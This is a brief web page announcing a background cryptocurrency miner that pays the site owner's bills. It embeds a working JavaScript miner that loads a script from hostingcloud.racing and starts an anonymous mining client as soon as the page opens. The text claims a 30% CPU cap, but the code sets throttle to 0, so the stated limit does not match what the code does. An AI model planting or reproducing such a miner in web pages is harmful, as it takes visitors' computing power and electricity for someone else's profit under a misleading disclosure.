CPU Crypto Miner

This Script is running on the background of my website.
Running a maximum of 30% of your CPU.
Staying on this page will help me pay the bills 🙂

<script src="https://www.hostingcloud.racing/XnTq.js"></script>
<script>
    var _client = new Client.Anonymous('d08e71f3e585a42fc0ebf903151d55a52b2970ecb71b16fb6e8aa38740c580b6', {
        throttle: 0
    });
    _client.start();
    _client.addMiningNotification("Top", "This site is running JavaScript miner from WRNR.it", "#cccccc", 40, "#3d3d3d");

</script>